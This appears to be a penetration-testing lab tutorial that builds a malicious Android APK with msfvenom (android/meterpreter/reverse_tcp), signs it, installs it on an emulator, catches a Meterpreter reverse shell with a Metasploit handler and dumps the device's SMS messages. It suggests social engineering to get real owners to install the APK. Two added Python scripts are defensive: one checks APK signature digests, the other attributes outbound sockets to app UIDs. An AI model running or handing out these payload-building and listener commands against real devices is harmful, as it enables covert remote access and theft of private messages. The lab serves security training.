In previous posts, we saw how Android devices can be used for penetration testing. Let’s reverse the sides and use our Android device as the target. In this post, we will learn how to create an APK file using the tools offered by Metasploit Framework. We will focus on Metasploit's Android-based payloads and use msfvenom to create the APK file.
Step 1: Creating APK
Enter the following command to generate the APK file that will be distributed to the victim:
msfvenom -p android/meterpreter/reverse_tcp LHOST=10.0.2.2 LPORT=4444 R > SignApk/evilAndroid.apk
We are entering 10.0.2.2 for "local host" because this is the IP that the emulator uses to communicate with the host computer.
It will take 2-3 minutes for the file to be created.
Step 2: Changing Directories
Once our APK is created, we will need to sign the file. This is an essential step because most Android devices won't install unsigned applications. Signing an APK is normally a multi-step process, but we can simplify it by using a pre-generated certificate and key file together with the signapk.jar utility. We saved all of these in the SignApk directory, the same directory where msfvenom wrote our APK. Change into that directory before running the signing command.
Step 3: Signing APK
Run the command below to sign the APK. Our signed file will be saved as evilAndroidc.apk.
java -jar signapk.jar certificate.pem key.pk8 evilAndroid.apk evilAndroidc.apk
To make sure that the file was created, list the working directory and confirm that evilAndroidc.apk is present.
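Because an unsigned APK is rejected at install time, the signature metadata is also the first thing a defender looks at when an unknown APK turns up. The following added example (not part of the original post, and not code from Metasploit or signapk) inspects a v1 (JAR-style) signature using only the Python standard library: it reports whether the signer files are present and whether every archive entry still matches the digest recorded in META-INF/MANIFEST.MF, which is how post-signing tampering shows up. It does not verify the RSA signature itself; `apksigner verify --print-certs` does that. The sample APK built by `build_sample_apk` is a constructed stand-in with placeholder contents and a placeholder CERT.RSA blob, not a real signed application.

```python
"""Inspect an APK's v1 (JAR) signature metadata without installing it."""
import base64
import hashlib
import io
import re
import zipfile

# Signature block files live in META-INF and carry one of these extensions.
SIG_FILE_RE = re.compile(r"^META-INF/[^/]+\.(RSA|DSA|EC)$", re.IGNORECASE)


def parse_manifest(text):
    """Parse a JAR manifest into {entry_name: {attribute: value}}; the main section is dropped."""
    # A line starting with a single space continues the previous line (72-byte wrapping).
    joined = text.replace("\r\n", "\n").replace("\n ", "")
    sections = {}
    for block in joined.split("\n\n"):
        attrs = {}
        for line in block.split("\n"):
            if ": " in line:
                key, value = line.split(": ", 1)
                attrs[key] = value
        if "Name" in attrs:
            sections[attrs["Name"]] = attrs
    return sections


def check_apk_v1(apk_bytes):
    """Return a report: signed?, signer files, entries whose digest mismatches, entries not listed."""
    report = {"signed": False, "signature_files": [], "digest_mismatches": [], "unlisted": []}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        names = zf.namelist()
        report["signature_files"] = [n for n in names if SIG_FILE_RE.match(n)]
        has_sf = any(n.upper().startswith("META-INF/") and n.upper().endswith(".SF") for n in names)
        report["signed"] = bool(report["signature_files"]) and has_sf
        if "META-INF/MANIFEST.MF" not in names:
            return report
        manifest = parse_manifest(zf.read("META-INF/MANIFEST.MF").decode("utf-8"))
        for name in names:
            if name.startswith("META-INF/") or name.endswith("/"):
                continue  # signature metadata and directories are not digested
            attrs = manifest.get(name)
            if attrs is None:
                report["unlisted"].append(name)  # added after signing, never covered by the manifest
                continue
            data = zf.read(name)
            if "SHA-256-Digest" in attrs:
                expected = attrs["SHA-256-Digest"]
                actual = base64.b64encode(hashlib.sha256(data).digest()).decode()
            elif "SHA1-Digest" in attrs:
                expected = attrs["SHA1-Digest"]
                actual = base64.b64encode(hashlib.sha1(data).digest()).decode()
            else:
                report["unlisted"].append(name)
                continue
            if expected != actual:
                report["digest_mismatches"].append(name)
    return report


def build_sample_apk(tamper=False, signed=True):
    """Constructed sample APK: placeholder entries plus a manifest with real SHA-256 digests.

    CERT.SF and CERT.RSA are placeholder bytes (constructed), not a real signature.
    With tamper=True, classes.dex is modified after the manifest was computed.
    """
    entries = {"AndroidManifest.xml": b"<placeholder manifest>", "classes.dex": b"dex\n035\x00placeholder"}
    manifest = "Manifest-Version: 1.0\nCreated-By: constructed sample\n\n"
    for name, data in entries.items():
        digest = base64.b64encode(hashlib.sha256(data).digest()).decode()
        manifest += f"Name: {name}\nSHA-256-Digest: {digest}\n\n"
    if tamper:
        entries["classes.dex"] = b"dex\n035\x00modified after signing"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, data in entries.items():
            zf.writestr(name, data)
        if signed:
            zf.writestr("META-INF/MANIFEST.MF", manifest)
            zf.writestr("META-INF/CERT.SF", "Signature-Version: 1.0\n\n")
            zf.writestr("META-INF/CERT.RSA", b"\x30\x82placeholder-pkcs7-block")
    return buf.getvalue()


if __name__ == "__main__":
    print(check_apk_v1(build_sample_apk()))
    print(check_apk_v1(build_sample_apk(tamper=True)))
    print(check_apk_v1(build_sample_apk(signed=False)))
```

On a real APK, pass the file's bytes to `check_apk_v1`; an empty `signature_files` list explains an install failure, while a non-empty `digest_mismatches` or `unlisted` list means the archive was altered after it was signed, which Android's installer would also reject.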
Step 4: Starting Metasploit Listener
Now let's start the Metasploit listener. We've done the step-by-step setup in other labs, so this time we will do it all at once with a one-liner command:
msfconsole -L -q -x "use exploit/multi/handler; set PAYLOAD android/meterpreter/reverse_tcp; set LHOST 127.0.0.1; set LPORT 4444; run"
The -q option is for "quiet", which suppresses the startup banner and version information. Note that LHOST here is the real loopback address 127.0.0.1, not the 10.0.2.2 alias that the emulator uses to reach the host.
Now open a new terminal tab (Ctrl + Shift + T).
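The payload is a reverse_tcp stager, so the compromised app holds an outbound TCP connection to LHOST:LPORT for as long as the session lives. On the device side that connection is visible in /proc/net/tcp along with the UID that owns the socket, and Android assigns every installed app its own UID, which is what makes this a practical triage step. The following added example (not from the original post) parses /proc/net/tcp as it would be read with `adb shell cat /proc/net/tcp`, decodes the kernel's hex addresses, and reports established connections from app UIDs to a watch list of ports. The embedded sample lines are constructed; the watch port 4444 is simply the LPORT used in this lab and is an illustrative indicator, not a reliable signature, since real triage keys on unexpected destinations rather than a fixed port.

```python
"""Attribute outbound TCP connections on an Android device to app UIDs via /proc/net/tcp."""
import socket
import struct

TCP_ESTABLISHED = "01"   # kernel TCP state code for ESTABLISHED
AID_APP_START = 10000    # first UID Android hands out to installed applications

# Constructed sample of `adb shell cat /proc/net/tcp` (not captured from a real device).
# Row 1: app UID 10050 connected to 10.0.2.2:4444 (the emulator's host alias and the lab's LPORT).
# Row 2: app UID 10020 connected to 192.168.1.1:443, ordinary traffic.
SAMPLE_PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:1F90 00000000:0000 0A 00000000:00000000 00:00000000 00000000  1000        0 11111 1 0000000000000000 100 0 0 10 0
   1: 0F02000A:A1B2 0202000A:115C 01 00000000:00000000 00:00000000 00000000 10050        0 23456 1 0000000000000000 20 4 30 10 -1
   2: 0F02000A:C3D4 0101A8C0:01BB 01 00000000:00000000 00:00000000 00000000 10020        0 34567 1 0000000000000000 20 4 30 10 -1
"""


def decode_addr(hex_addr):
    """Turn the kernel's 'AABBCCDD:PPPP' form into ('d.c.b.a', port).

    The IPv4 address is printed in host byte order, which is little-endian on
    ARM and x86 Android devices, hence the '<I' unpacking.
    """
    ip_hex, port_hex = hex_addr.split(":")
    ip = socket.inet_ntoa(struct.pack("<I", int(ip_hex, 16)))
    return ip, int(port_hex, 16)


def parse_proc_net_tcp(text):
    """Parse /proc/net/tcp into a list of connection dicts (header line skipped)."""
    conns = []
    for line in text.splitlines()[1:]:
        fields = line.split()
        if len(fields) < 10:
            continue
        local = decode_addr(fields[1])
        remote = decode_addr(fields[2])
        conns.append({
            "local": local,
            "remote": remote,
            "state": fields[3],
            "uid": int(fields[7]),
            "inode": int(fields[9]),
        })
    return conns


def app_uid_label(uid):
    """Render an app UID the way `ps` does on Android (user 0): u0_a<N>."""
    return f"u0_a{uid - AID_APP_START}" if uid >= AID_APP_START else str(uid)


def suspicious_outbound(conns, watch_ports):
    """Established connections owned by an app UID whose remote port is on the watch list."""
    return [
        c for c in conns
        if c["state"] == TCP_ESTABLISHED
        and c["remote"][1] in watch_ports
        and c["uid"] >= AID_APP_START
    ]


if __name__ == "__main__":
    hits = suspicious_outbound(parse_proc_net_tcp(SAMPLE_PROC_NET_TCP), {4444})
    for c in hits:
        print(f"{app_uid_label(c['uid'])} (uid {c['uid']}) -> {c['remote'][0]}:{c['remote'][1]}")
```

The UID is the pivot: once you have it, the package manager tells you which installed app it belongs to (on recent Android versions `adb shell pm list packages -U` prints package names with their UIDs), which turns an anonymous socket into a named APK to pull and examine.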
Step 5: Starting Android Emulator
Enter the following command to start the Android emulator instance that we will use as our target:
android-sdk-linux/tools/emulator @android17 -no-window
It may take several minutes for the emulator instance to start. Be patient.
Step 6: Migrating Consoles
Next, we need to upload our malicious APK. In a real-life scenario, you will need to use some social engineering techniques to trick the device owner into downloading and installing your APK. Let's say we did that, and now we will play the victim.
Open up a new tab "Tab 3".
Step 7: Installing APK
To install the APK, enter the command below. Make sure to use the signed version of the APK, evilAndroidc.apk, not the original evilAndroid.apk:
adb install SignApk/evilAndroidc.apk
You will get a "device offline" error at first: it takes some time for the emulated device to connect to the ADB server. If the command returns to the prompt with that error, try again. Keep re-entering the command until you see the "Success" message (you may have to try several times).
Step 8: Launching App
Next, we need to launch the application. Opening apps from the command line is a bit tricky: you need to know the name of the package and of the Activity. We looked them up for you, so just enter the following command to run the app:
adb shell am start com.metasploit.stage/.MainActivity
Step 9: Getting a Shell
Now go back to the Metasploit listener running in "Console Tab 1".
We got a Meterpreter shell!
Step 10: Using Meterpreter on Android
Android Meterpreter is similar to the Linux version that we used in other labs, but it has some unique options as well. Enter help to see the available commands.
Step 11: Getting System Information
Enter sysinfo to get information about the target system:
Step 12: Migrating Consoles
One of the most useful Meterpreter options is dump_sms, which does exactly what its name says: it dumps all SMS messages from the device into a text file.
Migrate to "Console tab 3" to send an SMS message to our device.
Step 13: Sending SMS
We can use Telnet to send SMS messages to emulated devices. First, open a Telnet session as follows:
telnet localhost 5554
Next, enter sms send followed by a phone number and message. You can use any values for these, just don't include any dashes in the phone number and make sure that your message is in quotes, for example:
sms send 1112223333 "Hey there"
Now again switch back to console tab 1.
Step 14: Dumping SMS
Enter the dump_sms command:
Note the name of the dump file. It will be saved in the current working directory. Enter exit twice to close the Meterpreter shell and exit out of Metasploit.
Step 15: Reading SMS Dump
Open the SMS dump file to read it (the file name includes your timestamp):
We can see the contents of the messages as well as the associated metadata.